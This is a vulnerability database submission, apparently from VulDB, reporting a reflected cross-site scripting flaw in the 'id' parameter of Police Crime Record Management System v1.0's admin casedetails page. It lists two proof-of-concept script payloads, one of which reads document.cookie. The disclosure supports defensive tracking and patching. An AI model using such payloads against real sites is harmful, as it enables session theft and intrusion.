제출 #109096: Police Crime Record Management System v1.0 /ghpolice/admin/casedetails.php GET parameter id exists XSS vulnerability정보

제목Police Crime Record Management System v1.0 /ghpolice/admin/casedetails.php GET parameter id exists XSS vulnerability
설명An issue was discovered in Police Crime Record Management System v1.0. There is a XSS vulnerability that it is possible to inject arbitrary JavaScript into the application's response via /ghpolice/admin/casedetails.php?id. Payload1:id="><script>alert(233)</script>&status=Completed Payload2:id="><script>alert(document.cookie)</script>&status=Completed
원천⚠️ https://github.com/fillorkill/bug_report/blob/main/XSS-1.md
사용자
 Derek_Zhang (UID 44176)
제출2023. 04. 01. PM 04:05 (3 연령 ago)
모더레이션2023. 04. 02. AM 08:50 (17 hours later)
상태수락
VulDB 항목224746 [SourceCodester Police Crime Record Management System 1.0 GET Parameter /admin/casedetails.php 아이디 크로스 사이트 스크립팅]
포인트들19

이전개요다음

Want to stay up to date on a daily basis?

Enable the mail alert feature now!